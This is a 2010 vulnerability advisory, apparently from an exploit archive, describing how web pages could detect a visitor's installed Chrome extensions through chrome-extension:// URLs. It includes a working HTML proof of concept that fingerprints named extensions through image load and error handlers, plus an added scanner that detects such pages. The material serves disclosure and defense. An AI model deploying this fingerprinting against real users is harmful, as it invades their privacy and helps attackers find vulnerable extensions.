
Google Chrome Arbitrary Extensions Detection

Posted Sep 8, 2010
Authored by Lostmon | Site lostmon.blogspot.com

Google Chrome suffers from an installed extensions arbitrary detection vulnerability.

tags | exploit, arbitrary
SHA-256 | 52da5016877181aca474a508679782a3b2ff97357ecd8b355f349ada96f2d008

######################################################
Google Chrome Installed extensions arbitrary detection
Vendor URL: http://www.google.com
Advisory: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notified: YES  Vendor confirmed: YES  Exploit: YES
######################################################

Change log: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is it to use extensions?
An attacker can access extension resources via an iframe (at this moment I
have not found a way to alter information from extensions).

For example:
<iframe src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"></iframe>

A remote user can modify this web document and call it with the "base" tag
in a malformed document:

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
So I think that chrome-extension needs sanitization so that internal
resources cannot be accessed from external web pages (file:/// and other
protocol handlers are safe to use and don't give access to internal
resources from external web documents).

So the chrome-extension protocol handler can be used to learn which extensions
are installed in the client browser, and then, if any extension is vulnerable
to something, this information can be used to exploit that extension.

Extensions are detectable in incognito mode too.

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
</head>
<body>
<!-- Each image points at a resource inside one extension:
     onLoad fires if the resource exists, onError if it does not. -->
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have installed Gmail checker plus</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have installed Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have installed My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have installed Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have installed Webpage Screenshot</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have installed Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have installed Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################
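
Pages that use this technique can be spotted by scanning served or crawled HTML for chrome-extension:// references and counting the distinct extension IDs they touch. The scanner below is an added example, not part of the original advisory; the function names, the threshold of two IDs and the sample page with placeholder IDs are assumptions made for illustration.

```javascript
// Added example (not from the advisory): static scan of HTML for
// chrome-extension:// resource references of the kind the PoC uses.
// Extension IDs are 32 characters drawn from the letters a-p.
const REF_RE =
  /\b(src|href|data)\s*=\s*["']?\s*chrome-extension:\/\/([a-p]{32})(\/[^"'\s>]*)?/gi;

// Best-effort tag lookup: the nearest "<name" before the attribute.
function enclosingTag(html, index) {
  const open = html.lastIndexOf("<", index);
  const m = open < 0 ? null : /^<\s*([a-z][a-z0-9]*)/i.exec(html.slice(open, index));
  return m ? m[1].toLowerCase() : "unknown";
}

// One finding per distinct extension ID, with the tags and paths that reference it.
function findExtensionRefs(html) {
  const byId = new Map();
  for (const m of html.matchAll(REF_RE)) {
    const id = m[2].toLowerCase();
    const entry = byId.get(id) || { id, tags: new Set(), paths: [] };
    entry.tags.add(enclosingTag(html, m.index));
    entry.paths.push(m[3] || "/");
    byId.set(id, entry);
  }
  return [...byId.values()].map(e => ({ ...e, tags: [...e.tags].sort() }));
}

// Several distinct IDs on one page indicates enumeration rather than
// integration with a single known extension (the threshold is an assumption).
function classifyPage(html, threshold = 2) {
  const refs = findExtensionRefs(html);
  const verdict = refs.length >= threshold ? "enumeration"
    : refs.length === 1 ? "single-reference" : "clean";
  // onload/onerror handlers are how the PoC turns a fetch into a yes/no answer.
  const usesLoadErrorHandlers = refs.length > 0 && /\bon(load|error)\s*=/i.test(html);
  return { verdict, distinctIds: refs.length, usesLoadErrorHandlers, refs };
}

// Constructed sample input modeled on the PoC; the IDs are placeholders.
const ID_A = "a".repeat(32), ID_B = "b".repeat(32);
const SAMPLE_PAGE = `
<base href="chrome-extension://${ID_A}/">
<img src="chrome-extension://${ID_A}/icon_128.png" onload="mark('A')" onerror="mark('-')">
<img src="chrome-extension://${ID_B}/icons/16.png" onload="mark('B')" onerror="mark('-')">
<img src="https://example.com/logo.png">`;

console.log(JSON.stringify(classifyPage(SAMPLE_PAGE), null, 2));
```

The tag lookup is approximate when an earlier attribute value contains a "<" character, so treat the reported tag as a hint and the extension ID count as the signal.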

##############
Timeline
##############

Discovered: 27 May 2010
Vendor notified: 01 Jun 2010
Vendor patch: 02 Sep 2010
Disclosure: 07 Sep 2010

#######################END########################

Thanks to Climbo for his patience and support.

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....